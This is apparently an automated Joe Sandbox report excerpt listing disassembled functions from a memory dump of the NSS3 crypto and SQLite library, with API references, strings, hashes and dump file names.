Instruction ID: 45ae2a4afeb6246bbcbb1df70de8930b9fe5aa29ecb7b1f69ceb4691ebcff7d4
Opcode Fuzzy Hash: 1c6a34649447dade52379f0f7f8e0d2fff6847166c162968fb90078e82b6de00
Instruction Fuzzy Hash: 4391B271A043409FEB04DF65DA45B5B77E1AF8431CF148A3CE98A87791EB31D855CB82

Function 6C7DEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7DDAE2,?), ref: 6C7DC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C7DF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C8A218C), ref: 6C7DF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C7DF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7DF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7DF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C7DF210

Part of subcall function 6C7852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C7DF1E9,?,00000000,?,?), ref: 6C7852F5
Part of subcall function 6C7852D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C78530F
Part of subcall function 6C7852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C785326
Part of subcall function 6C7852D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C7DF1E9,?,00000000,?,?), ref: 6C785340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7DF227

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C7DF23E

Part of subcall function 6C7CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C77E708,00000000,00000000,00000004,00000000), ref: 6C7CBE6A
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?), ref: 6C7CBE7E
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C7CBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7DF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7DF3A8

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7DF3B3

Part of subcall function 6C782D20: PK11_DestroyObject.NSS3(?,?), ref: 6C782D3C
Part of subcall function 6C782D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C782D5F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 501d511a2c935fba8dd8edf7337a92a3112fe19bb0fb5216ef823cb2b55476df
Instruction ID: 69ca2957c3304f1cf8d621525a5f00eb6328e6a21ea3fe3ce06c77e5df175ef1
Opcode Fuzzy Hash: 501d511a2c935fba8dd8edf7337a92a3112fe19bb0fb5216ef823cb2b55476df
Instruction Fuzzy Hash: AED15EB6E016059FEB14CFA9DA84A9EB7F5EF48308F1A8039D915A7711E731F805CB50

Function 6C6FECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C6FEF98

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FF483
database corruption, xrefs: 6C6FF48D
%s at line %d of [%.10s], xrefs: 6C6FF492

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: a30b69d882eed7191bafa3ed60cb5ccfae66eb7cd8a2db8ebd294ca7875f1d99
Instruction ID: 0bbef9ad1e11d9eca32513bc49ffabdc85b5b9bf6e4b944088ff0a93152af5ad
Opcode Fuzzy Hash: a30b69d882eed7191bafa3ed60cb5ccfae66eb7cd8a2db8ebd294ca7875f1d99
Instruction Fuzzy Hash: 13623470A042458FDB14CF68C484B9ABBF3BF45318F1841A8D8655BB92D735E887CBDA

Function 6C7A0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C7A0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7A0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C7A1006
PK11_FreeSymKey.NSS3(?), ref: 6C7A101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7A1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7A103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C7A1048
memcpy.VCRUNTIME140(?,?,?), ref: 6C7A108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7A10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C7A10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C7A112E

Part of subcall function 6C7A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C7A08C4,?,?), ref: 6C7A15B8
Part of subcall function 6C7A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C7A08C4,?,?), ref: 6C7A15C1
Part of subcall function 6C7A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A162E
Part of subcall function 6C7A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A1637

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 800eac017df7b5578c5618e243948afce98fe04ed16e473711d7e53ec1296b69
Instruction ID: 648cf5e0dc039e84ab95eae6494ed58bcec0cc0c7b35c3f818ab6970a461ecd8
Opcode Fuzzy Hash: 800eac017df7b5578c5618e243948afce98fe04ed16e473711d7e53ec1296b69
Instruction Fuzzy Hash: BA71C275A00205CFEB04CFAACA84A6BB7B5BF48318F14863CE51997711E771D946CB81

Function 6C75C650 Relevance: 16.5, APIs: 7, Strings: 2, Instructions: 760COMMON

Download Yara Rule

Strings

0123456789abcdef, xrefs: 6C75C859
0123456789ABCDEF, xrefs: 6C75D104

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEF$0123456789abcdef
API String ID: 0-885041942
Opcode ID: f7467f0e028e07c20a1d238d6ca7ae2c85578c96368faa267c81ca93d9d877c9
Instruction ID: 1e4edcc3fae0e1f80fd14bc7fbee1b4dee01dcc23169d743f346414d2bf3655a
Opcode Fuzzy Hash: f7467f0e028e07c20a1d238d6ca7ae2c85578c96368faa267c81ca93d9d877c9
Instruction Fuzzy Hash: 3E5246706083018FD714DF28C65035ABBE2EFCA359F948A2DE8D587B91DB35D856CB82

Function 6C848550 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 528stringCOMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000021B,recovered %d pages from %s,00000000,?), ref: 6C8485CC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8486CA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C84875F
memset.VCRUNTIME140(?,00000000,?), ref: 6C84893A
sqlite3_free.NSS3(?), ref: 6C848977
sqlite3_free.NSS3 ref: 6C8489A5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C848B68
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C848B79

Strings

recovered %d pages from %s, xrefs: 6C8485C2

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@sqlite3_free$memsetsqlite3_logstrcmpstrlen
String ID: recovered %d pages from %s
API String ID: 1138475946-1623757624
Opcode ID: cb64649f21a4a1fd790fd63f3d9cc278fdf4284fd20968c520cdc568cde09a09
Instruction ID: 5f8cc82aa9da724a7b3ea4636c8a8cdba14f11882bf79b06360cbcd546bd046f
Opcode Fuzzy Hash: cb64649f21a4a1fd790fd63f3d9cc278fdf4284fd20968c520cdc568cde09a09
Instruction Fuzzy Hash: 2A1239746083059FD714CF29C990B6BBBE5AF89308F048D2EE99AC7751E770E845CB92

Function 6C7C6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C3F

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C60
PR_ExplodeTime.NSS3(00000000,6C771C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C94

Strings

gfff, xrefs: 6C7C6D66
gfff, xrefs: 6C7C6D9C
gfff, xrefs: 6C7C6CFD
gfff, xrefs: 6C7C6CF5
gfff, xrefs: 6C7C6D30

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 7f720350263b342a041b7d2ae3a4ed76665f160bd2f34ba5cefc27872817462f
Instruction ID: 681b7aeb5f430fe867485bc7599c717d3cfb1e23e302fc388df6404fb078efdf
Opcode Fuzzy Hash: 7f720350263b342a041b7d2ae3a4ed76665f160bd2f34ba5cefc27872817462f
Instruction Fuzzy Hash: E5516C72B016494FC718CDADDD926EAB7DAABA4310F48C23AE442CB785D638E906C751

Function 6C848FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C848FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8490DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C849118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C84915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8491C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C849209

Strings

3333, xrefs: 6C84925E
UUUU, xrefs: 6C849255

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 6d8ca38df0b9cbae2f54ccab00ac5c9cdf48f635ff2e0c509141a5fc82a4d6cc
Instruction ID: c4411d26438112cfc2024d85e3dfef920f933b84509d7860b721a11a6e08c168
Opcode Fuzzy Hash: 6d8ca38df0b9cbae2f54ccab00ac5c9cdf48f635ff2e0c509141a5fc82a4d6cc
Instruction Fuzzy Hash: CBA19172E001199BDB24CB68CE91B9EB7B5BF88324F098579D915A7741E736AC01CBD0

Function 6C700FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C70103E
EnterCriticalSection.KERNEL32(?), ref: 6C701139
LeaveCriticalSection.KERNEL32(?), ref: 6C701190
sqlite3_free.NSS3(00000000), ref: 6C701227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C70126E
sqlite3_free.NSS3(?), ref: 6C70127F

Strings

winAccess, xrefs: 6C70129B
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C701267

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: bad670f76c0f15e98ef159babe40eb2dc7dd27e38ffecda068c7806a68a43e9c
Instruction ID: 293b713447c27e9020d90465aaacffe91bdc2ea968b8dc026b4912c6bafc8eb4
Opcode Fuzzy Hash: bad670f76c0f15e98ef159babe40eb2dc7dd27e38ffecda068c7806a68a43e9c
Instruction Fuzzy Hash: 5971E7B17052019BEB289F64DE85A6A33F6FB8636CF144639E91187A81DB30ED05C7D2

Function 6C70AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C82CF46,?,6C6FCDBD,?,6C82BF31,?,?,?,?,?,?,?), ref: 6C70B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31), ref: 6C70B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31), ref: 6C70B0A2
CloseHandle.KERNEL32(?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31,?,?,?,?,?,?,?,?,?), ref: 6C70B100
sqlite3_free.NSS3(?,?,00000002,?,6C82CF46,?,6C6FCDBD,?,6C82BF31,?,?,?,?,?,?,?), ref: 6C70B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31), ref: 6C70B12D

Part of subcall function 6C6F9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C70C6FD,?,?,?,?,6C75F965,00000000), ref: 6C6F9F0E
Part of subcall function 6C6F9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C75F965,00000000), ref: 6C6F9F5D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 7a199947758b6ee802323609e6d687380a98c7340936ea921d420658c2e97c7b
Instruction ID: 5af47b9488c326e009b9ec70981153c904fce35831893aba0eb7e7923da86eca
Opcode Fuzzy Hash: 7a199947758b6ee802323609e6d687380a98c7340936ea921d420658c2e97c7b
Instruction Fuzzy Hash: 5791BEB0B042068FDB14CF64CA85A6BB7F2BF85318F144A3DE41697A51EB30F945CB91

Function 6C888D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8D14E4,6C83CC70), ref: 6C888D47
PR_GetCurrentThread.NSS3 ref: 6C888D98

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C888E7B
htons.WSOCK32(?), ref: 6C888EDB
PR_GetCurrentThread.NSS3 ref: 6C888F99
PR_GetCurrentThread.NSS3 ref: 6C88910A

Strings

%u.%u.%u.%u, xrefs: 6C888E74

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 6cc04f0580245b3429808e9a7f95a93604149751f64e58e6fb5c2334f706d40b
Instruction ID: 13eda4025349f22d19ab122632f360c34bbd1fb9b9e543dd0bcd0b3490586bf2
Opcode Fuzzy Hash: 6cc04f0580245b3429808e9a7f95a93604149751f64e58e6fb5c2334f706d40b
Instruction Fuzzy Hash: BB02CA3590B2558FDB34CF19C6A836ABBA3EF42308F198A9AC8914FF91C335D905C790

Function 6C82A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C84C3A2,?,?,00000000,00000000), ref: 6C82A528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C82A6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A738

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C82A6CA
database corruption, xrefs: 6C82A6D4
%s at line %d of [%.10s], xrefs: 6C82A6D9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: f99dde1eb9ca7336060323ff729232a8bef724c9e841aac889b6cf0b8b5967df
Instruction ID: 1369a8802d6856b157e90b149c8a9df970ebef347b1d509f4c97c8cf35ee7720
Opcode Fuzzy Hash: f99dde1eb9ca7336060323ff729232a8bef724c9e841aac889b6cf0b8b5967df
Instruction Fuzzy Hash: EB91D2706087018BC724CF68C684AABB7E1BF48314F554E6DE8968BB91E738EC85C7C1

Function 6C804540 Relevance: 12.2, APIs: 8, Instructions: 170COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C804571
memset.VCRUNTIME140(?,00000000,00000000), ref: 6C8045B1
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C8045C2

Part of subcall function 6C8004C0: WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C80461B,-00000004), ref: 6C8004DF
Part of subcall function 6C8004C0: PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C80461B,-00000004), ref: 6C800534

PR_Now.NSS3 ref: 6C804626

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C804634
memcmp.VCRUNTIME140(?,?,?,00000000,?,000F4240,00000000), ref: 6C8046C4
PR_SetError.NSS3(FFFFD05A,00000000,00000000,?,000F4240,00000000), ref: 6C8046E3
PR_SetError.NSS3(?,00000000), ref: 6C804722

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

